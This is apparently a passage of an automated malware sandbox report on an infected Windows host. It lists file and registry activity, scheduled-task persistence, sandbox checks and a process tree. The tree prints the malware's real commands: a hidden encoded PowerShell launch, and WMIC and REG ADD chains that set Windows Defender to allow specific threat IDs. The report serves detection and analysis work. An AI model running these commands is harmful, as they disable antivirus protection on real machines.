File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | bXhtqdI.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | rundll32.exe
File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #2 | svchost.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6 | bXhtqdI.exe
File opened for modification | C:\Windows\System32\Tasks\RulYNORIEfYpYdh2 | svchost.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\RulYNORIEfYpYdh | svchost.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | bXhtqdI.exe
File opened for modification | C:\Windows\System32\Tasks\sQKEyxOvETjkhD | svchost.exe
File opened for modification | C:\Windows\System32\GroupPolicy | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | rundll32.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | svchost.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | bXhtqdI.exe
File opened for modification | C:\Windows\System32\Tasks\spuTWhHjihUt | svchost.exe
File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | rundll32.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\PowerControl LG | svchost.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | bXhtqdI.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\System32\Tasks\PowerControl HR | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #3 | svchost.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | bXhtqdI.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_BE9EEF936EC97838527255B8F50AE885 | bXhtqdI.exe
File opened for modification | C:\Windows\System32\Tasks\eoTgVxzVyVjpEcHcuxi2 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2481030822-2828258191-1606198294-1000 | svchost.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_8A6A7E24EA4C3355B6BE43AA2093BF34 | bXhtqdI.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #1 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #6 | svchost.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | bXhtqdI.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | bXhtqdI.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | bXhtqdI.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_BE9EEF936EC97838527255B8F50AE885 | bXhtqdI.exe
File opened for modification
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 bXhtqdI.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\Tasks\bvmcjEjDUxHOOxIZsK svchost.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\Tasks\YqJChhYnTMHzkMjCc svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 45 IoCs
Suspicious use of SetThreadContext 45 IoCs
Drops file in Program Files directory 64 IoCs
Drops file in Windows directory 64 IoCs
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash 40 IoCs
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Wed15edb855a49.exe, wXZz5xY9daoSOnWFCSX4abIE.exe, IX1zGxX9efDhwsZ12BGQ_ajS.tmp, aciavih

description | ioc | process
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Wed15edb855a49.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | wXZz5xY9daoSOnWFCSX4abIE.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | IX1zGxX9efDhwsZ12BGQ_ajS.tmp
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | IX1zGxX9efDhwsZ12BGQ_ajS.tmp
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | aciavih
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | aciavih
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | aciavih
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | aciavih
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | aciavih
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Wed15edb855a49.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | wXZz5xY9daoSOnWFCSX4abIE.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | IX1zGxX9efDhwsZ12BGQ_ajS.tmp
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | aciavih
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | aciavih
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Wed15edb855a49.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | wXZz5xY9daoSOnWFCSX4abIE.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | aciavih
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | aciavih
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Firstoffer.exe, choice.exe, Wed15c2e7469a14dca.exe, build2.exe, 406F.exe, svchost.exe

description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Firstoffer.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | choice.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Wed15c2e7469a14dca.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Wed15c2e7469a14dca.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Firstoffer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | choice.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | build2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | build2.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 406F.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 406F.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | svchost.exe
Creates scheduled task(s) 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exe (20 instances)

pid | process
7832 | schtasks.exe
8840 | schtasks.exe
6044 | schtasks.exe
8136 | schtasks.exe
4868 | schtasks.exe
9092 | schtasks.exe
3528 | schtasks.exe
9772 | schtasks.exe
7060 | schtasks.exe
4564 | schtasks.exe
7636 | schtasks.exe
11152 | schtasks.exe
10700 | schtasks.exe
7088 | schtasks.exe
7832 | schtasks.exe
10896 | schtasks.exe
4800 | schtasks.exe
8016 | schtasks.exe
10924 | schtasks.exe
6880 | schtasks.exe
Delays execution with timeout.exe 6 IoCs
Processes:
timeout.exe (6 instances)

pid | process
5548 | timeout.exe
3204 | timeout.exe
6352 | timeout.exe
8496 | timeout.exe
4472 | timeout.exe
10348 | timeout.exe
Download via BitsAdmin 1 TTPs 2 IoCs
Enumerates system info in registry 2 TTPs 9 IoCs
Processes:
Install.exe, chrome.exe, rundll32.exe

description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Kills process with taskkill 20 IoCs
Processes:
taskkill.exe (20 instances)

pid | process
10716 | taskkill.exe
10696 | taskkill.exe
8420 | taskkill.exe
6396 | taskkill.exe
5736 | taskkill.exe
9204 | taskkill.exe
6768 | taskkill.exe
6304 | taskkill.exe
7740 | taskkill.exe
5924 | taskkill.exe
8928 | taskkill.exe
5792 | taskkill.exe
4448 | taskkill.exe
5368 | taskkill.exe
5768 | taskkill.exe
7648 | taskkill.exe
7840 | taskkill.exe
8736 | taskkill.exe
6912 | taskkill.exe
11116 | taskkill.exe
Processes:
Igfukue.exe, OneDriveSetup.exe, browser_broker.exe, forfiles.exe, MicrosoftEdgeCP.exe

description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | Igfukue.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" | OneDriveSetup.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | Igfukue.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | OneDriveSetup.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | forfiles.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 64 IoCs
Script User-Agent 5 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 13 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 65 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 178 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 474 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 601 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
pid | process
2124 |
9456 | foldershare.exe
Suspicious behavior: MapViewOfSection 40 IoCs
Suspicious behavior: SetClipboardViewer 2 IoCs
Processes:
pid | process
6140 | 6571754.scr
7984 | 1477080.scr
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 64 IoCs
Suspicious use of SendNotifyMessage 32 IoCs
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
pid | process
2124 |
5728 | forfiles.exe
4892 | FC10.exe
4892 | FC10.exe
5836 | 3wIhaEv7Ltp2XU8bgsQTib5q.exe
9492 | MicrosoftEdge.exe
11248 | MicrosoftEdgeCP.exe
11248 | MicrosoftEdgeCP.exe
6100 | MicrosoftEdge.exe
6044 | MicrosoftEdgeCP.exe
6044 | MicrosoftEdgeCP.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes
(each entry: [tree depth] image path, then the command line, then the behaviours tagged for that process)
- [1] c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
- [1] c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s SENS
- [1] c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s Themes
- [1] c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
- [1] c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s WpnService
- [1] c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
- [2] C:\Windows\system32\wbem\WMIADAP.EXE
  wmiadap.exe /F /T /R
- [1] c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s Browser
- [1] c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
- [1] c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
- [1] c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s BITS
  - Suspicious use of SetThreadContext
- [2] C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
- [1] c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
- [1] c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
- [1] c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
  - Drops file in System32 directory
  - Drops file in Windows directory
- [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
- [3] C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
- [2] C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\OOWUeMc.exe
  C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\OOWUeMc.exe uG /site_id 394347 /S
  - Drops file in System32 directory
- [3] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
- [4] C:\Windows\SysWOW64\forfiles.exe
  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
- [5] C:\Windows\SysWOW64\cmd.exe
  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
- [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
- [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
- [4] C:\Windows\SysWOW64\forfiles.exe
  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
- [5] C:\Windows\SysWOW64\cmd.exe
  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
- [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
- [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
- [4] C:\Windows\SysWOW64\forfiles.exe
  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
- [5] C:\Windows\SysWOW64\cmd.exe
  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
- [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
- [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
- [4] C:\Windows\SysWOW64\forfiles.exe
  forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
- [5] C:\Windows\SysWOW64\cmd.exe
  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
- [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
- [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
- [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
- [4] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
- [5] C:\Windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
